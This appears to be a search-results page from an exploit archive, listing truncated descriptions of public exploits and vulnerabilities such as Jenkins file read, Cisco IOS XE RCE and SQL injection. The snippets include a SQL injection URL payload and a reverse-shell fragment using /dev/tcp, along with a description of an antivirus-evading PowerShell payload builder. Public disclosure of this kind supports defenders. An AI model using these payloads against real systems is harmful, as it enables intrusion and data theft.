39001 matches found
Jenkins 2.441 / LTS 2.426.3 Arbitrary File Read Exploit
Jenkins versions 2.441 and below and LTS 2.426.3 and below remote arbitrary file read proof of concept exploit written in Python. python poc.py usage: python poc.py http://127.0.0.1:8888/ /etc/passwd import threading import http.client import time import uuid import urllib.parse import sys if...
Centreon 22.04.0 Cross Site Scripting Vulnerability
Exploit Title: Stored XSS in servicealias parameter in Centreon version 22.04.0 Exploit Author: syad Vendor Homepage: Centreon Software Link: https://download.centreon.com/ Version: 22.04.0 CVE ID : CVE-2022-39988 Tested on: Centos 7 Centreon 22.04.0 is vulnerable to Stored Cross Site Scripting X...
Cisco IOX XE Unauthenticated Remote Code Execution Chain Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Cisco IOX XE Unauthenticated RCE Chain', 'Description' = %q This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable...
Lexmark Device Embedded Web Server Remote Code Execution Exploit
An unauthenticated remote code execution vulnerability exists in the embedded webserver in certain Lexmark devices through 2023-02-19. The vulnerability is only exposed if, when setting up the printer or device, the user selects "Set up Later" when asked if they would like to add an Admin user. I...
Open Web Analytics 1.7.3 Remote Code Execution Exploit
Open Web Analytics OWA versions prior to 1.7.4 allow an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. class MetasploitModule 'Open Web Analytics 1.7.3 - Remote Code Execution RCE', 'Description' = %q Op...
Froxlor 2.0.6 Remote Command Execution Exploit
Froxlor versions 2.0.6 and below suffer from a bug that allows authenticated users to change the application logs path to any directory on the OS level which the user www-data can write without restrictions from the backend which leads to writing a malicious Twig template that the application wil...
qdPM 9.1 - Remote Code Execution (Authenticated) Exploit
Exploit Title: qdPM 9.1 - Remote Code Execution RCE Authenticated Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net Original Exploit Author: Rishal Dwivedi Loginsoft Original ExploitDB ID: 47954 https://www.exploit-db.com/exploits/47954 Exploit Author: Leon Trappett thepcn3rd Vendor...
Online Reviewer System 2.4.0 SQL Injection Vulnerability
Sourcecodester-Online-Reviewer-System-2.4.0 SQL - 4 types of injection vulnerability Vendor Description: The password parameter appears of the Online Reviewer System 1.0 to be vulnerable to SQL injection attacks - 4 types of injection vulnerability. A single quote was submitted in the password...
WhatsUpGold 21.0.3 - Stored Cross-Site Scripting Vulnerability
Exploit Title: WhatsUpGold 21.0.3 - Stored Cross-Site Scripting XSS Exploit Author: Andreas Finstad 4ndr34z Vendor Homepage: https://www.whatsupgold.com Version: v.21.0.3, Build 188 Tested on: Windows 2019 Server CVE : CVE-2021-41318 Reference: https://f20.be/cves/poc-cve-2021-41318 Description:...
Build Your Own Botnet 2.0.0 Remote Code Execution Exploit
Build Your Own Botnet BYOB version 2.0.0 exploit that works by spoofing an agent callback to overwrite the sqlite database and bypass authentication and exploiting an authenticated command injection in the payload builder page. Exploit Title: BYOB Build Your Own Botnet v2.0.0 Unauthenticated RCE...
GilaCMS 1.15.4 SQL Injection Vulnerability
Description: GilaCMS widget and use wiget area filter to perform search Sample payload: http://targeturl/cm/listrows/widget?page=1&area=dashboard'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,@@version,NULL--%20 Attack Vector 2: After login into admin portal, go to edit...
Xenforo 2.2.15 Remote Code Execution Vulnerability
XenForo versions 2.2.15 and below suffer from a remote code execution vulnerability in the Template system. ----------------------------------------------------------------------- XenForo = 2.2.15 Template System Remote Code Execution Vulnerability...
Deep Sea Electronics DSE855 Remote Authentication Bypass Vulnerability
Deep Sea Electronics DSE855 is vulnerable to configuration disclosure when direct object reference is made to the Backup.bin file using an HTTP GET request. This will enable an attacker to disclose sensitive information and help her in authentication bypass, privilege escalation, and full system...
GaatiTrack Courier Management System 1.0 Cross Site Scripting Vulnerability
Exploit Title: GaatiTrack Courier Management System v1.0 - Multiple Cross-site scripting Exploit Author: BugsBD Security Researcher Rahad Chowdhury Vendor Homepage: https://www.mayurik.com/ Software Link: https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php...
FTPDummy 4.80 - Local Buffer Overflow (SEH) Exploit
Exploit Title: FTPDummy 4.80 - Local Buffer Overflow SEH Author: Felipe Winsnes Software Link: http://www.dummysoftware.com/ftpdummy.html Version: 4.80 Tested on: Windows 7 x86 Blog: https://whitecr0wz.github.io/ Proof of Concept: 1.- Run the python script, it will create the file...
Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Modification Vulnerability
Cisco ThousandEyes Enterprise Agent Virtual Appliance version thousandeyes-va-64-18.04 0.218 suffers from an unpatched vulnerability in sudoedit, allowed by sudo configuration, which permits a low-privilege user to modify arbitrary files as root and subsequently execute arbitrary commands as root...
Microsoft Windows UTF-8 Buffer Overruns Exploit
When Microsoft released UTF-8 support for the -A interfaces of the Windows API, it appears to have introduced buffer overrun conditions. Hi @ll, almost 4 years ago, with Windows 10 1903, after more than a year beta-testing in insider previews, Microsoft finally released UTF-8 support for the -A...
Prestashop blockwishlist module 2.1.0 - SQL injection Exploit
Exploit Title: Prestashop blockwishlist module 2.1.0 - SQLi Date: 29/07/22 Exploit Author: Karthik UJ @5up3r541y4n Vendor Homepage: https://www.prestashop.com/en Software Link blockwishlist: https://github.com/PrestaShop/blockwishlist/releases/tag/v2.1.0 Software Link prestashop:...
Windows MultiPoint Server 2011 RpcEptMapper and Dnschade Local Privilege Escalation Vulnerability
Exploit Title: Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation Exploit Author: it Vendor Homepage: https://www.microsoft.com Software Link: https://www.microsoft.com/pt-br/download/details.aspx?id=8518 Version: Version 6.1 Compilation 7601 Service Pack 1...
CE Phoenix 1.0.8.20 Remote Command Execution Vulnerability
Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution RCE Authenticated Date: 2023-11-25 Exploit Author: tmrswrr Category: Webapps Vendor Homepage: CE Phoenix Version: v1.0.8.20 Tested on: Softaculous Demo - CE Phoenix POC: 1. Login to admin panel: - Visit:...
Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated) Exploit
Exploit Title: Wing FTP Server 6.3.8 - Remote Code Execution Authenticated Exploit Author: v1n1v131r4 Vendor Homepage: https://www.wftpserver.com/ Software Link: https://www.wftpserver.com/download.htm Version: 6.3.8 Tested on: Windows 10 CVE : -- Wing FTP Server have a web console based on Lua...
Softing Secure Integration Server 1.22 Remote Code Execution Exploit
This Metasploit module chains two vulnerabilities to achieve authenticated remote code execution against Softing Secure Integration Server version 1.22. In CVE-2022-1373, the restore configuration feature is vulnerable to a directory traversal vulnerability when processing zip files. When using t...
Hospital Management System Project In ASP.Net MVC 1 SQL Injection Vulnerability
Hospital Management System Project in ASP.Net MVC version 1 suffers from a remote SQL injection vulnerability that allows for authentication bypass. Exploit Title: Hospital Management System Project in ASP.Net MVC - SQL Injection / Authentication Bypass Date: 07/16/2024 Exploit Author: 0xMykull...
Artica Proxy 4.40 / 4.50 Local File Inclusion / Traversal Vulnerability
Title: Artica Proxy Unauthenticated LFI Protection Bypass Vulnerability Advisory ID: KL-001-2024-001 Publication Date: 2024.03.05 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-001.txt 1. Vulnerability Details Affected Vendor: Artica Affected Product: Artica Proxy Affecte...
Microsoft Word 16.72.23040900 - Remote Code Execution Vulnerability
Exploit Title: Microsoft Word 16.72.23040900 - Remote Code Execution RCE Author: nu11secur1ty Vendor: https://www.microsoft.com/ Software: https://www.microsoft.com/en-us/microsoft-365/word?activetab=tabs%3afaqheaderregion3 Reference:...
WBCE CMS 1.5.2 - Remote Code Execution (Authenticated) Exploit
Exploit Title: WBCE CMS 1.5.2 - Remote Code Execution RCE Authenticated Exploit Author: Antonio Cuomo arkantolo Vendor Homepage: https://wbce.org/ Software Link: https://wbce.org/de/downloads/ Version: 1.5.2 Tested on: Linux - PHP Version: 8.0.14 Github repo: https://github.com/WBCE/WBCECMS --...
orangescrum 1.8.0 - (Multiple) SQL Injection Vulnerability
Exploit Title: orangescrum 1.8.0 - 'Multiple' SQL Injection Authenticated Exploit Author: Hubert Wojciechowski Contact Author: email protected Company: https://redteam.pl Vendor Homepage: https://www.orangescrum.org/ Software Link: https://www.orangescrum.org/ Version: 1.8.0 Testeted on: Windows ...
Pharmacy Point Of Sale System 1.0 SQL Injection Vulnerability
Exploit Title: Pharmacy Point of Sale System v1.0 - SQLi Authentication Bypass Exploit Author: Janik Wehrli Vendor Homepage: https://www.sourcecodester.com/php/14957/pharmacy-point-sale-system-using-php-and-sqlite-free-source-code.html Software Link:...
Juniper SRX Firewall / EX Switch Remote Code Execution Exploit
This Metasploit module exploits a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls and EX switches. The affected Juniper devices running FreeBSD and every FreeBSD process can access their stdin by opening /dev/fd/0. The exploit also makes use of two useful PHP...
RDP DOUBLEPULSAR Remote Code Execution Exploit
This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for RDP. While this module primarily performs code execution against the implant, the "Neutralize implant" target allows you to disable the implant. This module requires Metasploit:...
Staubli Jacquard Industrial System JC6 Shellshock Vulnerability
Staubli Jacquard Industrial System JC6 suffers from a bash environment variable handling code injection vulnerability. Exploit Title: Staubli Jacquard Industrial System | GNU Bash Environment Variable Handling Code Injection Shellshock Exploit Author: t4rkd3vilz Vendor Homepage:...
Wordpress WP Guppy 1.1 Plugin - WP-JSON API Sensitive Information Disclosure Vulnerability
Exploit Title: Wordpress Plugin WP Guppy 1.1 - WP-JSON API Sensitive Information Disclosure Exploit Author: Keyvan Hardani Vendor Homepage: https://wp-guppy.com/ Version: up to 1.1 Tested on: Kali Linux - Windows 10 - Wordpress 5.8.x and apache2 Usage ./exploit.sh -h !/bin/bash Help Display Help...
Teraway FileStream 1.0 Insecure Cookie Handling Vulnerability
Exploit for unknown platform in category web applications ============================================================= Teraway FileStream 1.0 Insecure Cookie Handling Vulnerability ============================================================= -------------------------------------+...
Microsoft SQL Server db_ddladmin Privilege Escalation Vulnerability
Microsoft SQL Server versions 2014 through 2022 suffers from a dbddladmin privilege escalation vulnerability. When escalated to Microsoft as a concern, they instead opted to update their documentation to note that this is possible instead of addressing the issue. Title: SQL Server Privilege...
WordPress Contact Form Generator 2.5.5 Cross Site Scripting Vulnerability
Exploit Title: WP Plugins Contact Form Generator 2.5.5 - Reflected Cross-Site Scripting Exploit Author: Arvandy Software Link: https://wordpress.org/plugins/contact-form-generator/ Vendor Homepage: https://www.creative-solutions.net/ Version: 2.5.5 Tested on: Windows, Linux CVE: CVE-2023-37988...
IObit Malware Fighter 9.2 Tampering / Privilege Escalation Vulnerability
IObit Malware Fighter version 9.2 fails to provide sufficient anti-tampering protection and that shortcoming can be leveraged to escalate to SYSTEM privileges. + Credits: Yehia Elghaly aka Mrvar0x + Website: https://mrvar0x.com/ + Source:...
Typora 0.9.9.24.6 - Directory Traversal Vulnerability
Exploit Title: Code execution via path traversal Exploit Author: Dhiraj Mishra Vendor Homepage: http://typora.io Software Link: https://typora.io/download/Typora.dmg Version: 0.9.9.24.6 Tested on: macOS Mojave v10.14.4 CVE: CVE-2019-12137 References: https://nvd.nist.gov/vuln/detail/CVE-2019-1213...
Apache Magicka Remote Code Execution Vulnerability
Apache and PHP remote command execution exploit that leverages php5-cgi. / Apache Magica by Kingcope / / gcc apache-magika.c -o apache-magika -lssl / / This is a code execution bug in the combination of Apache and PHP. On Debian and Ubuntu the vulnerability is present in the default install of th...
TikiWiki <= 1.9 Sirius (jhot.php) Remote Command Execution Exploit
Exploit for unknown platform in category web applications ================================================================== TikiWiki 126 $result.=" .";...
Rocket LMS 1.6 Cross Site Scripting Vulnerability
Exploit Title: Rocket LMS - Learning Management System Reflected Cross Site Scripting Exploit Author: th3d1gger Vendor Homepage: https://codecanyon.net Software Link: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735 Version: Version 1.6 Tested on Ubuntu 18.04...
Sonar Qube 8.3.1 - (SonarQube Service) Unquoted Service Path Vulnerability
Title: Sonar Qube 8.3.1 - 'SonarQube Service' Unquoted Service Path Author: Velayutham Selvaraj Vendor Homepage: https://www.sonarqube.org Software Link: https://www.sonarqube.org/downloads/ Version : 8.3.1 Tested on: Windows 10 64bitEN About Unquoted Service Path : ==============================...
Musicbox 2.3.8 - Multiple Vulnerabilities
Musicbox version 2.3.8 suffers from cross site scripting, remote shell upload, and remote SQL injection vulnerabilities. Exploit Title : Musicbox 2.3.8 Multiple Vulnerabilities Author : DevilScreaM Date : 25/08/2013 Category : Web Applications Vendor : http://www.musicboxv2.com/ Version : 1.0 -...
vBulletin 5.5.2 PHP Object Injection Exploit
vBulletin versions 5.5.2 and below suffers from an issue where user input passed through the "messageids" request parameter to /ajax/api/vb4private/movepm is not properly sanitized before being used in a call to the unserialize PHP function. This can be exploited by malicious users to inject...
Teleport v10.1.1 - Remote Code Execution Vulnerability
Exploit Title: Teleport v10.1.1 - Remote Code Execution RCE Exploit Author: Brandon Roach & Brian Landrum Vendor Homepage: https://goteleport.com Software Link: https://github.com/gravitational/teleport Version: /dev/tcp/10.0.0.1/5555 0&1...
Powershell Code Arbitary Execution Builder FUD Exploit
A desired powershell.ps1 hides the payload with special methods. It allows it to run secretly on the installed computer. Bypasses all modern antivirus protections. Completely FUD...
Social Codia SMS 1 Shell Upload Exploit
sms-Unrestricted-File-Upload-RCE-POC Author: D4rkP0w4r Description - Upload web shell at avartar teacher in admin panel Step to Reproduct Login to admin - Teacher - Add Teacher - upload web shell at avartar teacher - Add Teacher Exploit Upload web shell at avartar teacher When upload success acce...
Exim 4.98 SQL Injection Vulnerability
Exim versions 4.98 before 4.98.1 suffer from a remote SQL injection vulnerability. CVE 2025-26794 - Sat, 08 Feb 2025 21:14:37 +0100: reported - by: "Oscar Bataille" - to: email protected - Sun, 9 Feb 2025 00:00:05 +0100: report confirmed - Tue, 11 Feb 2025 00:23:34 +0100: issue confirmed - Tue, 1...
Windows Escalate UAC Execute RunAs Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Windows Escalate UAC Execute RunAs', 'Description' = %q This module will attempt to elevate execution level using the ShellExecute undocumented...
Apache OFBiz 18.12.09 Remote Code Execution Exploit
Apache OFBiz version 18.12.09 suffers from a pre-authentication remote code execution vulnerability. From: Jacques Le Roux Date: Mon, 04 Dec 2023 21:04:50 +0000 Severity: moderate Affected versions: - Apache OFBiz before 18.12.10 Description: Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to...
LISTSERV 17 Cross Site Scripting Vulnerability
Exploit Title: LISTSERV 17 - Reflected Cross Site Scripting XSS Exploit Author: Shaunt D Vendor Homepage: https://www.lsoft.com/ Version: 17 Tested on: Windows Server 2019 CVE : CVE-2022-39195 A reflected cross-site scripting XSS vulnerability in the LISTSERV 17 web interface allows remote...